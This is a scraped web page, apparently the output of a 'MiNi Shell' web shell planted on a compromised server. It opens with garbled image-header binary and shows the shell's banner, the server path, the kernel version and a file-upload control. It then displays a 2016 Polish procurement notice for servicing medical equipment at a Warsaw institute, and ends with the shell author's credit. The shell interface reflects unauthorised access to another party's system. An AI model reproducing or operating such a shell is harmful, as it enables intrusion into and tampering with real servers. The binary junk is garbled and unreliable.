JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20160517/54659-N-2016.html

<p class="kh_header"><b>Warszawa: Serwis aparatry medycznej  - 32 zadania. (25/PN/2016/ŁCH)</b><br>
<b>Numer ogłoszenia: 54659 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Instytut Geriatrii, Reumatologii i Rehabilitacji im. prof. dr hab.med. Eleonory Reicher , ul. Spartańska 1, 02-637 Warszawa, woj. mazowieckie, tel. 22 8449406.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spartanska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis aparatry medycznej  - 32 zadania. (25/PN/2016/ŁCH).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej z podziałem na 32 zadania.
Zadanie 1: Stały nadzór serwisowy diatermii. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy diatermii. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 2: Stały nadzór serwisowy wstrzykiwacza kontrastu. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy wstrzykiwacza kontrastu. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 3: Stały nadzór serwisowy komory laminarnej K700. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy komory laminarnej K700. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 4: Stały nadzór serwisowy komory laminarnej PY 100. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy komory laminarnej PY 100. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 5: Stały nadzór serwisowy pomp infuzyjnych. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy pomp infuzyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 6: Stały nadzór serwisowy myjni do narzędzi. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy myjni do narzędzi oraz płuczki. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 7: Stały nadzór serwisowy tonometru. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy tonometru. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 8: Stały nadzór serwisowy zestawu artroskopowego ARTHREX. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy zestawu artroskopowego ARTHREX. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 9: Stały nadzór serwisowy aparatury medycznej I. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 10: Stały nadzór serwisowy ultrasonografu I. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy ultrasonografu I. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 11: Stały nadzór serwisowy kriokomory. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy kriokomory. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 12: Stały nadzór serwisowy urządzenia do krioterapii miejscowej. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy kriokomory. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 13: Stały nadzór serwisowy aparatury optycznej. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 14: Stały nadzór serwisowy aparatu EMG 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 15: Stały nadzór serwisowy aparatury medycznej III. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 16: Stały nadzór serwisowy aparatu do znieczulenia. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatu do znieczulenia. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz nr 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 17: Stały nadzór serwisowy aparatury medycznej IV. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej IV. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 18: Stały nadzór serwisowy centrali monitorującej funkcje życiowe pacjenta. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej IV. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 19: Stały nadzór serwisowy aparatu EMG z EEG. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej IV. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 20: Stały nadzór serwisowy aparatury medycznej V. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej V. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 21: Stały nadzór serwisowy aparatury medycznej VI. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy aparatury medycznej VI. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 22: Stały nadzór serwisowy sterylizatorów. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy sterylizatorów 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 23: Stały nadzór serwisowy autoklawów. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy autoklawów. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 24: Stały nadzór serwisowy lampy operacyjnej sufitowej. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy lampy operacyjnej sufitowej. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 25: Stały nadzór serwisowy ssaków Basic. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy ssaków Basic. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 26: Stały nadzór serwisowy stołów operacyjnych. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 27: Stały nadzór serwisowy aparatury medycznej VII. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 28: Stały nadzór serwisowy ciśnieniomierza stacjonarnego. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 29: Stały nadzór serwisowy sterylizatora plazmowego. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zamawiający nie dopuszcza składania ofert wariantowych.
Zadanie 30: Stały nadzór serwisowy ultrasonografów. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 31: Stały nadzór serwisowy ultrasonografów. 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ. 
Zadanie 32: Stały nadzór serwisowy ultrasonografu. 
Wspólny Słownik Zamówień: 50421000-2 - Usługi w zakresie napraw i konserwacji sprzętu medycznego 
Opis: Przedmiotem zamówienia jest stały nadzór serwisowy stołów operacyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Osoby zdolne do wykonania zamówienia odpowiednio dla zadań 2, 5-8, 10-11, 14-19, 24-26, 28-32.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca będzie dysponował, co najmniej dwoma osobami uczestniczącymi w realizacji umowy, które odbyły szkolenie serwisowe potwierdzone certyfikatem/świadectwem wystawionym przez producenta sprzętu i aparatury medycznej lub autoryzowanego dystrybutora sprzętu na wykonywanie usług serwisowych. 
2. Osoby zdolne do wykonania zamówienia odpowiednio dla zadań 1, 3, 4, 9, 12, 13, 20-23, 27.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca będzie dysponował, co najmniej dwoma osobami uczestniczącymi w realizacji umowy, które odbyły odpowiednie szkolenie, mają doświadczenie i praktykę serwisowania aparatury medycznej dla serwisu sprzętu wskazanego w zadaniu w którym wykonawca składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty;
2.Formularz asortymentowo-cenowy;
3.Dokumenty, z których będzie wynikać uprawnienie do podpisania oferty-
Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu wyszczególnionego w pkt 7.2.2 SIWZ, do oferty należy załączyć, np. pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy Pzp, przewiduje możliwość zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w zakresie: 
1)zmiany terminu realizacji umowy, w przypadku, gdy zmiana leży w interesie Zamawiającego lub jest uzasadniona jego potrzebami;
2)zmiany sposobu realizacji umowy w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili zawierania umowy lub zmiana jest korzystna dla Zamawiającego;
3)zmniejszenia zakresu rzeczowego zamówienia poprzez rezygnację z części zamówienia lub rozwiązania umowy w przypadku wycofania danego urządzenia z eksploatacji z jednoczesnym proporcjonalnym zmniejszeniem wartości umowy,
4)zastąpienia przedmiotu umowy urządzeniem, o takim samym przeznaczeniu, w przypadku wycofania przedmiotu zamówienia z eksploatacji przy jednoczesnym zachowaniu wartości umowy.
5)zmiany wynagrodzenia Wykonawcy w przypadku zmiany:
a)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
b)zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spartanska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, budynek nr 4, pokój: Dział Zamówień Publicznych i Umów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 10:00, miejsce: w siedzibie Zamawiającego, budynek nr 4, pokój: Dział Zamówień Publicznych i Umów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwis aparatury medycznej - 32 zadania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia w odniesieniu do poszczególnych części zamówienia, stanowią odpowiednio załącznik nr 1a oraz 1b do SIWZ, który stanowi integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com